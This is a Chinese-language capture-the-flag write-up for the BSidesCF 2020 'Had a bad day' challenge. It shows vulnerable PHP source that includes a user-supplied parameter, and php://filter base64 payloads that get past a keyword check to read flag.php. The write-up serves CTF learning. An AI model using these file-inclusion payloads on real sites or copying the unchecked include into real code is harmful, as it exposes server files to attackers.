[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad day

 

 

[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad day

 

首先利用PHP伪协议读取index.php源代码
构造php://filter/read=convert.base64-encode/resource=index.php
[BSidesCF 2020]Had a bad day

 

 

出现报错信息

发现除掉后缀即可读取到源码,是一堆base64编码

[BSidesCF 2020]Had a bad day

 

 

base64解码后得到源代码,主要源代码:

              <?php
                $file = $_GET['category'];

                if(isset($file))
                {
                    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
                        include ($file . '.php');
                    }
                    else{
                        echo "Sorry, we currently only support woofers and meowers.";
                    }
                }
                ?>

利用include函数尝试包含flag

构造index.php?category=woofers/../flag

发现没有读出来任何东西
利用 php://filter伪协议可以套一层协议 读取flag.php
构造php://filter/read=convert.base64-encode/woofers/resource=flag

[BSidesCF 2020]Had a bad day

base64解码后得到flag

[BSidesCF 2020]Had a bad day

 

上一篇:SAP Fiori Launchpad tile跳转目标的解析逻辑


下一篇:toad -评分卡模型